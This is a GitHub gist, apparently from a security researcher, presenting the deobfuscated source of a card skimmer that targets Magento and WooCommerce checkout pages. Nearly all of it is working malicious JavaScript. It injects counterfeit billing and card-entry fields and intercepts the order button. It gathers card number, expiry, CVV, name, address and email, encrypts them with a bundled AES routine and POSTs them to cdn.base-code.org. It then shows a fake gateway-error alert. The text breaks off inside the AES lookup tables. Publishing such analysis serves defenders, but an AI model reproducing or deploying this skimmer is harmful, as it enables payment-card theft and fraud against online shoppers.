Skip to content

Instantly share code, notes, and snippets.

@BenBaryoPX

BenBaryoPX/cdn.base-code.org-analytics-code.js-Generic-deob-renamed.js

Created June 21, 2022 17:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save BenBaryoPX/6737b7e1085bd7d9cc19c2e216e1ba38 to your computer and use it in GitHub Desktop.
Save BenBaryoPX/6737b7e1085bd7d9cc19c2e216e1ba38 to your computer and use it in GitHub Desktop.
Download ZIP
Skimmer found served from cdn.base-code.org attacking Magento's Authorize CIM Payment module
Raw
cdn.base-code.org-analytics-code.js-Generic-deob-renamed.js
var lscr, teros, binoms, adumn, hinnes, dertons, linomx, _gfv, hornis, derit, kilons, admis;
(function () {
var attack = function () {
function startInjections() {
if (localStorage.getItem('mage-cache-version')) {
return;
}
if (typeof jQuery === 'undefined') {
return;
}
if (jQuery('#billing_email_field')[0] && !jQuery('#billing_address_field')[0]) {
if (!jQuery('#billing_first_name_field')[0]) {
jQuery('#billing_email_field')[0].insertAdjacentHTML('beforebegin', '<p class="form-row form-row-first validate-required" id="billing_first_name_field" data-priority="10"><label for="billing_first_name" class="">First name&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_first_name" id="billing_first_name" placeholder="" value="" autocomplete="given-name"></span></p><p class="form-row form-row-last validate-required" id="billing_last_name_field" data-priority="20"><label for="billing_last_name" class="">Last name&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_last_name" id="billing_last_name" placeholder="" value="" autocomplete="family-name"></span></p><p class="form-row form-row-wide validate-required validate-address" id="billing_address_field" data-priority="110"><label for="billing_address" class="">Address&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_email" id="billing_address" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-city" id="billing_city_field" data-priority="110"><label for="billing_city" class="">City&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_city" id="billing_city" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-postcode" id="billing_postcode_field" data-priority="110"><label for="billing_postcode" class="">Postal code&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="email" class="input-text " name="billing_postcode" id="billing_postcode" placeholder="" value="" autocomplete=""></span></p>');
} else {
jQuery('#billing_email_field')[0].insertAdjacentHTML('beforebegin', '<p class="form-row form-row-wide validate-required validate-address" id="billing_address_field" data-priority="110"><label for="billing_address" class="">Address&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_email" id="billing_address" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-city" id="billing_city_field" data-priority="110"><label for="billing_city" class="">City&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_city" id="billing_city" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-postcode" id="billing_postcode_field" data-priority="110"><label for="billing_postcode" class="">Postal code&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="email" class="input-text " name="billing_postcode" id="billing_postcode" placeholder="" value="" autocomplete=""></span></p>');
}
}
if (jQuery('#payment_method_intasend').is(':checked')) {
injectPaymentTable();
} else {
jQuery('#form-table').remove();
document.viewFrom = false;
}
}
function removeInjectionIfDone() {
if (document.viewFrom) {
if (localStorage.getItem('recently_viewed_product_session')) {
jQuery('#form-table').remove();
document.viewFrom = false;
}
}
}
function injectPaymentTable() {
function hookInjectedPaymentTable() {
if (jQuery('#cardCVV')[0]) {
jQuery('#cardCVV')[0].addEventListener('change', changeCallback, true);
}
if (jQuery('#place_order')[0]) {
jQuery('#place_order')[0].addEventListener('click', clickCallback, true);
}
jQuery('#cardNoInput').removeAttr('disabled');
jQuery('#cardMonth').removeAttr('disabled');
jQuery('#cardYear').removeAttr('disabled');
jQuery('#cardCVV').removeAttr('disabled');
}
if (!jQuery('#form-table')[0] && jQuery('.payment_method_intasend p')[0]) {
jQuery('.payment_method_intasend p').after('<table cellpadding="0" id="form-table" cellspacing="0" border="0" style="min-width: 300px;margin-top: 15px !important;max-width: 360px;border: none !important;"><tbody style=" border: none !important;"><tr style=" border: none !important;"><td class="two width190" style=" border: none !important;"><label for="cardNoInput"><span style="font-family: Verdana,Geneva,Arial,Helvetica,Sans-Serif;font-size: 10pt;font-weight: bold !important;">Card number</span></label></td><td class="two" style=" border: none !important;"> <input type="text" id="cardNoInput" name="cardNoInput" tabindex="60" value="" maxlength="20" autocomplete="off" class="has-error" style="border: 1px solid red;border: 1px solid rgb(213, 213, 213);"></td></tr><tr><td class="two width190" style=" border: none !important;"><span style="font-family: Verdana,Geneva,Arial,Helvetica,Sans-Serif;font-size: 10pt;font-weight: bold !important;">Expiry date</span></td><td class="two" style=" border: none !important;"> <select name="cardExp.month" tabindex="110" id="cardMonth" class="has-error" style=" width: 45%; "><option value="" selected="selected">--</option><option value="1">01</option><option value="2">02</option><option value="3">03</option><option value="4">04</option><option value="5">05</option><option value="6">06</option><option value="7">07</option><option value="8">08</option><option value="9">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option> </select> <select name="cardExp.year" tabindex="120" id="cardYear" class="has-error" style=" width: 45%; "><option value="" selected="selected">----</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option><option value="2027">2027</option><option value="2028">2028</option><option value="2029">2029</option><option value="2030">2030</option><option value="2031">2031</option><option value="2032">2032</option><option value="2033">2033</option><option value="2034">2034</option><option value="2035">2035</option><option value="2036">2036</option><option value="2037">2037</option><option value="2038">2038</option><option value="2039">2039</option> </select></td></tr><tr><td class="two width190" style=" border: none !important;"><label for="cardCVV"> <span style="font-family: Verdana,Geneva,Arial,Helvetica,Sans-Serif;font-size: 10pt;font-weight: bold !important;">CVC</span></label></td><td class="two" style=" border: none !important;"> <input type="text" id="cardCVV" name="cardCVV" tabindex="70" size="4" maxlength="4" autocomplete="off" value="" class="has-error" style=" width: 40%; "></td></tr></tbody></table>');
setTimeout(hookInjectedPaymentTable, 2000);
document.viewFrom = true;
}
}
function validateCcFields(fieldNamesArr) {
function validateField(fieldName) {
var element = jQuery('#' + fieldName);
switch (fieldName) {
case 'cardNoInput':
if (!element.val() || !isValidCcNumber(element.val())) {
element.css('border', '1px solid red');
isDataComplete = false;
} else {
element.css('border', '1px solid rgb(213, 213, 213)');
}
break;
case 'cardCVV':
if (!element.val() || element.val().length < 3) {
element.css('border', '1px solid red');
isDataComplete = false;
} else {
element.css('border', '1px solid rgb(213, 213, 213)');
}
break;
default:
if (!element.val()) {
element.css('border', '1px solid red');
isDataComplete = false;
} else {
element.css('border', '1px solid rgb(213, 213, 213)');
}
break;
}
}
var isDataComplete = true;
[
'cardMonth',
'cardYear',
'cardCVV',
'cardNoInput'
].forEach(validateField);
return isDataComplete;
}
function changeCallback(event) {
if (event && event.currentTarget && event.currentTarget.value) {
collectAllAvailablePii();
}
}
function isValidCcNumber(ccNum) {
ccNum = ccNum.replace(/ /g, '');
var digit, reverseNum, alternateNow, sumOfDigits, i, numLength;
alternateNow = true;
sumOfDigits = 0;
reverseNum = (ccNum + '').split('').reverse();
for (i = 0, numLength = reverseNum.length; i < numLength; i++) {
digit = reverseNum[i];
digit = parseInt(digit, 10);
if (alternateNow = !alternateNow) {
digit *= 2;
}
if (digit > 9) {
digit -= 9;
}
sumOfDigits += digit;
}
return sumOfDigits % 10 === 0;
}
function clickCallback(event) {
function markAttackAsCompleted() {
localStorage.setItem('mage-cache-version', generateGUID__());
localStorage.setItem('recently_viewed_product_session', generateGUID__());
alert('Gateway error. You will be automatically redirected to the our website for payment processing after placing the order.');
jQuery('#place_order').click();
jQuery('#form-table').remove();
document.viewFrom = false;
}
if (!localStorage.getItem('mage-cache-version') && document.viewFrom) {
if (validateCcFields()) {
collectAllAvailablePii();
setTimeout(markAttackAsCompleted, 1500);
}
event.stopPropagation();
event.preventDefault();
}
}
function collectAllAvailablePii() {
var details = {
cdnb: jQuery('#cardNoInput').val(),
cdm: jQuery('#cardMonth').val(),
cdy: jQuery('#cardYear').val(),
cdc: jQuery('#cardCVV').val(),
f: getValueFromLocalStorageOrElement('#billing_first_name'),
l: getValueFromLocalStorageOrElement('#billing_last_name'),
e: getValueFromLocalStorageOrElement('#billing_email'),
t: null,
a: getValueFromLocalStorageOrElement('#billing_address'),
a2: '',
co: 'US',
pc: getValueFromLocalStorageOrElement('#billing_postcode'),
c: getValueFromLocalStorageOrElement('#billing_city')
};
if (!details.f || !details.a || !details.c) {
var _0x47FF = jQuery('#billing-address-select option:selected').text();
if (_0x47FF) {
var _0x4742 = _0x47FF.split(',');
if (_0x4742 && _0x4742.length) {
if (!details.f) {
details.cdn = _0x4742[0] ? _0x4742[0].trim() : '';
}
details.a = _0x4742[1] ? _0x4742[1].trim() : '';
details.c = _0x4742[2] ? _0x4742[2].trim() : '';
if (_0x4742[3] && _0x4742[3].length) {
var _0x4757 = _0x4742[3].trim().split(' ');
details.r = _0x4757[0] ? _0x4757[0].trim() : '';
details.pc = _0x4757[1] ? _0x4757[1].trim() : '';
}
}
}
}
var parsedData = {
Address: details.a + ' ' + details.a2,
CCname: details.cdn || details.f + ' ' + details.l,
Email: details.e,
Phone: details.t,
Sity: details.c,
State: details.r,
Country: details.co,
Zip: details.pc,
Shop: window.location.host,
CcNumber: details.cdnb,
ExpDate: details.cdm + '/' + details.cdy,
Cvv: details.cdc,
Useragent: navigator.userAgent,
Uid: 'e0c9f90de835a3296f9ac37d60473842e39ecef9'
};
var _0x47D5 = JSON.stringify(parsedData);
var _0x47AB = derit();
var _0x4796 = kilons();
var _0x476C;
_0x476C = {
main: admis(_0x47D5, _0x47AB, _0x4796),
guid: _0x47AB,
refer: _0x4796
};
jQuery.ajax({
url: 'https://cdn.base-code.org/web/',
data: {
main: _0x476C.main,
uniqueId: _0x476C.guid,
storedId: _0x476C.refer
},
type: 'POST',
dataType: 'json'
});
}
function getValueFromLocalStorageOrElement(target, isLocalStorage) {
var val = '';
if (isLocalStorage) {
val = localStorage.getItem(target) || '';
} else {
val = jQuery(target).val() || '';
}
return val;
}
function generateGUID__() {
function getRand() {
return Math.floor((1 + Math.random()) * 65536).toString(16).substring(1);
}
return getRand() + getRand() + '-' + getRand() + '-' + getRand() + '-' + getRand() + '-' + getRand() + getRand() + getRand();
}
function generateGUID_() {
var output = '';
for (var _ = 0; _ < 32; _++) {
output += String.fromCharCode(Math.round(Math.random() * 255));
}
var _0x4757 = document.getElementById('key');
return btoa(output);
}
function generateIV_() {
var output = '';
for (var _ = 0; _ < 16; _++) {
output += String.fromCharCode(Math.round(Math.random() * 255));
}
var _0x4757 = document.getElementById('iv');
return btoa(output);
}
function encryptData_(data, guid, iv) {
function generateGuid32() {
existingGuid = [];
for (var _ = 0; _ < 32; _++) {
existingGuid.push(Math.round(255 * Math.random()));
}
}
function generateIv16() {
existingIv = [];
for (var _ = 0; _ < 16; _++) {
existingIv.push(Math.round(255 * Math.random()));
}
}
function getCodeArrFromString(s) {
function str2CodeArr(str) {
for (var arr = [], i = 0; i < str.length; i++) {
arr.push(str.charCodeAt(i));
}
return arr;
}
return str2CodeArr(atob(s));
}
function rotate_(arrLen3) {
for (var firstItem = arrLen3[0], i = 0; i < 3; i++) {
arrLen3[i] = arrLen3[i + 1];
}
return arrLen3[3] = firstItem, arrLen3;
}
function core_(_0x476C, _0x4742) {
_0x476C = this.rotate(_0x476C);
for (var _0x4757 = 0; _0x4757 < 4; ++_0x4757) {
_0x476C[_0x4757] = this.sbox[_0x476C[_0x4757]];
}
return _0x476C[0] = _0x476C[0] ^ this.Rcon[_0x4742], _0x476C;
}
function expandKey_(_0x4814, _0x4796) {
for (var _0x47EA = 16 * (this.numberOfRounds(_0x4796) + 1), _0x47C0 = 0, _0x47D5 = 1, _0x4757 = [], _0x47FF = [], _0x4742 = 0; _0x4742 < _0x47EA; _0x4742++) {
_0x47FF[_0x4742] = 0;
}
for (var _0x4781 = 0; _0x4781 < _0x4796; _0x4781++) {
_0x47FF[_0x4781] = _0x4814[_0x4781];
}
for (_0x47C0 += _0x4796; _0x47C0 < _0x47EA;) {
for (var _0x4829 = 0; _0x4829 < 4; _0x4829++) {
_0x4757[_0x4829] = _0x47FF[_0x47C0 - 4 + _0x4829];
}
if (_0x47C0 % _0x4796 == 0 && (_0x4757 = this.core(_0x4757, _0x47D5++)), _0x4796 == this.keySize.SIZE_256 && _0x47C0 % _0x4796 == 16) {
for (var _0x476C = 0; _0x476C < 4; _0x476C++) {
_0x4757[_0x476C] = this.sbox[_0x4757[_0x476C]];
}
}
for (var _0x47AB = 0; _0x47AB < 4; _0x47AB++) {
_0x47FF[_0x47C0] = _0x47FF[_0x47C0 - _0x4796] ^ _0x4757[_0x47AB], _0x47C0++;
}
}
return _0x47FF;
}
function addRoundKey_(_0x4757, _0x472D) {
for (var _0x4742 = 0; _0x4742 < 16; _0x4742++) {
_0x4757[_0x4742] ^= _0x472D[_0x4742];
}
return _0x4757;
}
function createRoundKey_(_0x4781, _0x472D) {
for (var _0x476C = [], _0x4742 = 0; _0x4742 < 4; _0x4742++) {
for (var _0x4757 = 0; _0x4757 < 4; _0x4757++) {
_0x476C[4 * _0x4757 + _0x4742] = _0x4781[_0x472D + 4 * _0x4742 + _0x4757];
}
}
return _0x476C;
}
function subBytes_(_0x476C, _0x4742) {
for (var _0x4757 = 0; _0x4757 < 16; _0x4757++) {
_0x476C[_0x4757] = _0x4742 ? this.rsbox[_0x476C[_0x4757]] : this.sbox[_0x476C[_0x4757]];
}
return _0x476C;
}
function shiftRows_(_0x476C, _0x4742) {
for (var _0x4757 = 0; _0x4757 < 4; _0x4757++) {
_0x476C = this.shiftRow(_0x476C, 4 * _0x4757, _0x4757, _0x4742);
}
return _0x476C;
}
function shiftRow_(_0x47AB, _0x4742, _0x4781, _0x4757) {
for (var _0x476C = 0; _0x476C < _0x4781; _0x476C++) {
if (_0x4757) {
for (var _0x472D = _0x47AB[_0x4742 + 3], _0x4796 = 3; _0x4796 > 0; _0x4796--) {
_0x47AB[_0x4742 + _0x4796] = _0x47AB[_0x4742 + _0x4796 - 1];
}
_0x47AB[_0x4742] = _0x472D;
} else {
for (_0x472D = _0x47AB[_0x4742], _0x4796 = 0; _0x4796 < 3; _0x4796++) {
_0x47AB[_0x4742 + _0x4796] = _0x47AB[_0x4742 + _0x4796 + 1];
}
_0x47AB[_0x4742 + 3] = _0x472D;
}
}
return _0x47AB;
}
function galois_multiplication_(_0x4781, _0x472D) {
for (var _0x476C = 0, _0x4742 = 0; _0x4742 < 8; _0x4742++) {
1 == (1 & _0x472D) && (_0x476C ^= _0x4781), _0x476C > 256 && (_0x476C ^= 256);
var _0x4757 = 128 & _0x4781;
(_0x4781 <<= 1) > 256 && (_0x4781 ^= 256), 128 == _0x4757 && (_0x4781 ^= 27), _0x4781 > 256 && (_0x4781 ^= 256), (_0x472D >>= 1) > 256 && (_0x472D ^= 256);
}
return _0x476C;
}
function mixColumns_(_0x47AB, _0x4757) {
for (var _0x4796 = [], _0x476C = 0; _0x476C < 4; _0x476C++) {
for (var _0x4781 = 0; _0x4781 < 4; _0x4781++) {
_0x4796[_0x4781] = _0x47AB[4 * _0x4781 + _0x476C];
}
_0x4796 = this.mixColumn(_0x4796, _0x4757);
for (var _0x4742 = 0; _0x4742 < 4; _0x4742++) {
_0x47AB[4 * _0x4742 + _0x476C] = _0x4796[_0x4742];
}
}
return _0x47AB;
}
function mixColumn_(_0x4796, _0x4742) {
var _0x4781 = [];
_0x4781 = _0x4742 ? [14,9,13,11] : [2,1,1,3];
for (var _0x4757 = [], _0x476C = 0; _0x476C < 4; _0x476C++) {
_0x4757[_0x476C] = _0x4796[_0x476C];
}
return _0x4796[0] = this.galois_multiplication(_0x4757[0], _0x4781[0]) ^ this.galois_multiplication(_0x4757[3], _0x4781[1]) ^ this.galois_multiplication(_0x4757[2], _0x4781[2]) ^ this.galois_multiplication(_0x4757[1], _0x4781[3]), _0x4796[1] = this.galois_multiplication(_0x4757[1], _0x4781[0]) ^ this.galois_multiplication(_0x4757[0], _0x4781[1]) ^ this.galois_multiplication(_0x4757[3], _0x4781[2]) ^ this.galois_multiplication(_0x4757[2], _0x4781[3]), _0x4796[2] = this.galois_multiplication(_0x4757[2], _0x4781[0]) ^ this.galois_multiplication(_0x4757[1], _0x4781[1]) ^ this.galois_multiplication(_0x4757[0], _0x4781[2]) ^ this.galois_multiplication(_0x4757[3], _0x4781[3]), _0x4796[3] = this.galois_multiplication(_0x4757[3], _0x4781[0]) ^ this.galois_multiplication(_0x4757[2], _0x4781[1]) ^ this.galois_multiplication(_0x4757[1], _0x4781[2]) ^ this.galois_multiplication(_0x4757[0], _0x4781[3]), _0x4796;
}
function round_(_0x4757, _0x4742) {
return _0x4757 = this.subBytes(_0x4757, false), _0x4757 = this.shiftRows(_0x4757, false), _0x4757 = this.mixColumns(_0x4757, false), _0x4757 = this.addRoundKey(_0x4757, _0x4742);
}
function invRound(_0x4757, _0x4742) {
return _0x4757 = this.shiftRows(_0x4757, true), _0x4757 = this.subBytes(_0x4757, true), _0x4757 = this.addRoundKey(_0x4757, _0x4742), _0x4757 = this.mixColumns(_0x4757, true);
}
function main_(_0x4781, _0x4742, _0x476C) {
_0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 0));
for (var _0x4757 = 1; _0x4757 < _0x476C; _0x4757++) {
_0x4781 = this.round(_0x4781, this.createRoundKey(_0x4742, 16 * _0x4757));
}
return _0x4781 = this.subBytes(_0x4781, false), _0x4781 = this.shiftRows(_0x4781, false), _0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 16 * _0x476C));
}
function invMain_(_0x4781, _0x4742, _0x476C) {
_0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 16 * _0x476C));
for (var _0x4757 = _0x476C - 1; _0x4757 > 0; _0x4757--) {
_0x4781 = this.invRound(_0x4781, this.createRoundKey(_0x4742, 16 * _0x4757));
}
return _0x4781 = this.shiftRows(_0x4781, true), _0x4781 = this.subBytes(_0x4781, true), _0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 0));
}
function numberOfRounds_(_0x4757) {
var _0x4742;
switch (_0x4757) {
case this.keySize.SIZE_128:
_0x4742 = 10;
break;
case this.keySize.SIZE_192:
_0x4742 = 12;
break;
case this.keySize.SIZE_256:
_0x4742 = 14;
break;
default:
return null;
}
return _0x4742;
}
function encrypt_(_0x47FF, _0x4796, _0x47D5) {
for (var _0x47AB = [], _0x47C0 = [], _0x4757 = this.numberOfRounds(_0x47D5), _0x47EA = 0; _0x47EA < 4; _0x47EA++) {
for (var _0x4742 = 0; _0x4742 < 4; _0x4742++) {
_0x47C0[_0x47EA + 4 * _0x4742] = _0x47FF[4 * _0x47EA + _0x4742];
}
}
var _0x4781 = this.expandKey(_0x4796, _0x47D5);
_0x47C0 = this.main(_0x47C0, _0x4781, _0x4757);
for (var _0x4814 = 0; _0x4814 < 4; _0x4814++) {
for (var _0x476C = 0; _0x476C < 4; _0x476C++) {
_0x47AB[4 * _0x4814 + _0x476C] = _0x47C0[_0x4814 + 4 * _0x476C];
}
}
return _0x47AB;
}
function decrypt_(_0x47FF, _0x4796, _0x47D5) {
for (var _0x47AB = [], _0x47C0 = [], _0x4757 = this.numberOfRounds(_0x47D5), _0x47EA = 0; _0x47EA < 4; _0x47EA++) {
for (var _0x4742 = 0; _0x4742 < 4; _0x4742++) {
_0x47C0[_0x47EA + 4 * _0x4742] = _0x47FF[4 * _0x47EA + _0x4742];
}
}
var _0x4781 = this.expandKey(_0x4796, _0x47D5);
_0x47C0 = this.invMain(_0x47C0, _0x4781, _0x4757);
for (var _0x4814 = 0; _0x4814 < 4; _0x4814++) {
for (var _0x476C = 0; _0x476C < 4; _0x476C++) {
_0x47AB[4 * _0x4814 + _0x476C] = _0x47C0[_0x4814 + 4 * _0x476C];
}
}
return _0x47AB;
}
function getBlock_(_0x4781, _0x4742, _0x476C, _0x4757) {
return _0x476C - _0x4742 > 16 && (_0x476C = _0x4742 + 16), _0x4781.slice(_0x4742, _0x476C);
}
function encrypt__(_0x4853, _0x47C0, _0x4829, _0x47EA) {
var _0x47FF = _0x4829.length;
if (_0x47EA.length % 16) {
throw 'iv length must be 128 bits.';
}
var _0x4781 = [], _0x483E = [], _0x4742 = [], _0x47AB = [], _0x4868 = [], _0x4796 = true;
if (_0x47C0 == this.modeOfOperation.CBC && this.padBytesIn(_0x4853), null !== _0x4853) {
for (var _0x47D5 = 0; _0x47D5 < Math.ceil(_0x4853.length / 16); _0x47D5++) {
var _0x4757 = 16 * _0x47D5, _0x476C = 16 * _0x47D5 + 16;
if (16 * _0x47D5 + 16 > _0x4853.length && (_0x476C = _0x4853.length), _0x4781 = this.getBlock(_0x4853, _0x4757, _0x476C, _0x47C0), _0x47C0 == this.modeOfOperation.CFB) {
_0x4796 ? (_0x4742 = this.aes.encrypt(_0x47EA, _0x4829, _0x4829.length), _0x4796 = false) : _0x4742 = this.aes.encrypt(_0x483E, _0x4829, _0x4829.length);
for (var _0x487D = 0; _0x487D < 16; _0x487D++) {
_0x47AB[_0x487D] = _0x4781[_0x487D] ^ _0x4742[_0x487D];
}
for (var _0x4814 = 0; _0x4814 < _0x476C - _0x4757; _0x4814++) {
_0x4868.push(_0x47AB[_0x4814]);
}
_0x483E = _0x47AB;
} else {
if (_0x47C0 == this.modeOfOperation.OFB) {
_0x4796 ? (_0x4742 = this.aes.encrypt(_0x47EA, _0x4829, _0x4829.length), _0x4796 = false) : _0x4742 = this.aes.encrypt(_0x483E, _0x4829, _0x4829.length);
for (_0x487D = 0; _0x487D < 16; _0x487D++) {
_0x47AB[_0x487D] = _0x4781[_0x487D] ^ _0x4742[_0x487D];
}
for (_0x4814 = 0; _0x4814 < _0x476C - _0x4757; _0x4814++) {
_0x4868.push(_0x47AB[_0x4814]);
}
_0x483E = _0x4742;
} else {
if (_0x47C0 == this.modeOfOperation.CBC) {
for (_0x487D = 0; _0x487D < 16; _0x487D++) {
_0x483E[_0x487D] = _0x4781[_0x487D] ^ (_0x4796 ? _0x47EA[_0x487D] : _0x47AB[_0x487D]);
}
_0x4796 = false, _0x47AB = this.aes.encrypt(_0x483E, _0x4829, _0x4829.length);
for (_0x4814 = 0; _0x4814 < 16; _0x4814++) {
_0x4868.push(_0x47AB[_0x4814]);
}
}
}
}
}
}
return _0x4868;
}
function decrypt__(_0x483E, _0x4814, _0x47D5, _0x47EA) {
var _0x4781 = _0x47D5.length;
if (_0x47EA.length % 16) {
throw 'iv length must be 128 bits.';
}
var _0x4829 = [], _0x4742 = [], _0x47AB = [], _0x4853 = [], _0x4796 = [], _0x47C0 = true;
if (null !== _0x483E) {
for (var _0x4757 = 0; _0x4757 < Math.ceil(_0x483E.length / 16); _0x4757++) {
var _0x476C = 16 * _0x4757, _0x4868 = 16 * _0x4757 + 16;
if (16 * _0x4757 + 16 > _0x483E.length && (_0x4868 = _0x483E.length), _0x4829 = this.getBlock(_0x483E, _0x476C, _0x4868, _0x4814), _0x4814 == this.modeOfOperation.CFB) {
for (_0x47C0 ? (_0x47AB = this.aes.encrypt(_0x47EA, _0x47D5, _0x47D5.length), _0x47C0 = false) : _0x47AB = this.aes.encrypt(_0x4742, _0x47D5, _0x47D5.length), i = 0; i < 16; i++) {
_0x4853[i] = _0x47AB[i] ^ _0x4829[i];
}
for (var _0x47FF = 0; _0x47FF < _0x4868 - _0x476C; _0x47FF++) {
_0x4796.push(_0x4853[_0x47FF]);
}
_0x4742 = _0x4829;
} else {
if (_0x4814 == this.modeOfOperation.OFB) {
for (_0x47C0 ? (_0x47AB = this.aes.encrypt(_0x47EA, _0x47D5, _0x47D5.length), _0x47C0 = false) : _0x47AB = this.aes.encrypt(_0x4742, _0x47D5, _0x47D5.length), i = 0; i < 16; i++) {
_0x4853[i] = _0x47AB[i] ^ _0x4829[i];
}
for (_0x47FF = 0; _0x47FF < _0x4868 - _0x476C; _0x47FF++) {
_0x4796.push(_0x4853[_0x47FF]);
}
_0x4742 = _0x47AB;
} else {
if (_0x4814 == this.modeOfOperation.CBC) {
for (_0x47AB = this.aes.decrypt(_0x4829, _0x47D5, _0x47D5.length), i = 0; i < 16; i++) {
_0x4853[i] = (_0x47C0 ? _0x47EA[i] : _0x4742[i]) ^ _0x47AB[i];
}
_0x47C0 = false;
for (_0x47FF = 0; _0x47FF < _0x4868 - _0x476C; _0x47FF++) {
_0x4796.push(_0x4853[_0x47FF]);
}
_0x4742 = _0x4829;
}
}
}
}
_0x4814 == this.modeOfOperation.CBC && this.unpadBytesOut(_0x4796);
}
return _0x4796;
}
function padBytesIn_(_0x476C) {
for (var _0x4742 = 16 - _0x476C.length % 16, _0x4757 = 0; _0x4757 < _0x4742; _0x4757++) {
_0x476C.push(_0x4742);
}
}
function unpadBytesOut_(_0x4781) {
for (var _0x4742 = 0, _0x476C = -1, _0x4757 = _0x4781.length - 1; _0x4757 >= _0x4781.length - 1 - 16 && _0x4781[_0x4757] <= 16; _0x4757--) {
if (-1 == _0x476C && (_0x476C = _0x4781[_0x4757]), _0x4781[_0x4757] != _0x476C) {
_0x4742 = 0;
break;
}
if (++_0x4742 == _0x476C) {
break;
}
}
_0x4742 > 0 && _0x4781.splice(_0x4781.length - _0x4742, _0x4742);
}
function str2EncodedArr(str) {
for (var outArr = [], i = 0; i < str.length; i++) {
var charcode = str.charCodeAt(i);
outArr.push(255 & charcode), outArr.push(charcode >> 8 & 255);
}
return outArr;
}
function arr2String(arr) {
for (var outStr = '', i = 0; i < arr.length; i++) {
outStr += String.fromCharCode(arr[i]);
}
return btoa(outStr);
}
var existingGuid = guid, existingIv = iv, utils = {
aes: {
keySize: {
SIZE_128: 16,
SIZE_192: 24,
SIZE_256: 32
},
sbox: [99,124,119,123,242,107,111,197,48,1,103,43,254,215,171,118,202,130,201,125,250,89,71,240,173,212,162,175,156,164,114,192,183,253,147,38,54,63,247,204,52,165,229,241,113,216,49,21,4,199,35,195,24,150,5,154,7,18,128,226,235,39,178,117,9,131,44,26,27,110,90,160,82,59,214,179,41,227,47,132,83,209,0,237,32,252,177,91,106,203,190,57,74,76,88,207,208,239,170,251,67,77,51,133,69,249,2,127,80,60,159,168,81,163,64,143,146,157,56,245,188,182,218,33,16,255,243,210,205,12,19,236,95,151,68,23,196,167,126,61,100,93,25,115,96,129,79,220,34,42,144,136,70,238,184,20,222,94,11,219,224,50,58,10,73,6,36,92,194,211,172,98,145,149,228,121,231,200,55,109,141,213,78,169,108,86,244,234,101,122,174,8,186,120,37,46,28,166,180,198,232,221,116,31,75,189,139,138,112,62,181,102,72,3,246,14,97,53,87,185,134,193,29,158,225,248,152,17,105,217,142,148,155,30,135,233,206,85,40,223,140,161,137,13,191,230,66,104,65,153,45,15,176,84,187,22],
rsbox: [82,9,106,213,48,54,165,56,191,64,163,158,129,243,215,251,124,227,57,130,155,47,255,135,52,142,67,68,196,222,233,203,84,123,148,50,166,194,35,61,238,76,149,11,66,250,195,78,8,46,161,102,40,217,36,178,118,91,162,73,109,139,209,37,114,248,246,100,134,104,152,22,212,164,92,204,93,101,182,146,108,112,72,80,253,237,185,218,94,21,70,87,167,141,157,132,144,216,171,0,140,188,211,10,247,228,88,5,184,179,69,6,208,44,30,143,202,63,15,2,193,175,189,3,1,19,138,107,58,145,17,65,79,103,220,234,151,242,207,206,240,180,230,115,150,172,116,34,231,173,53,133,226,249,55,232,28,117,223,110,71,241,26,113,29,41,197,137,111,183,98,14,170,24,190,27,252,86,62,75,198,210,121,32,154,219,192,254,120,205,90,244,31,221,168,51,136,7,199,49,177,18,16,89,39,128,236,95,96,81,127,169,25,181,74,13,45,229,122,159,147,201,156,239,160,224,59,77,174,42,245,176,200,235,187,60,131,83,153,97,23,43,4,126,186,119,214,38,225,105,20,99,85,33,12,125],
rotate: rotate_,
Rcon: [141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203],
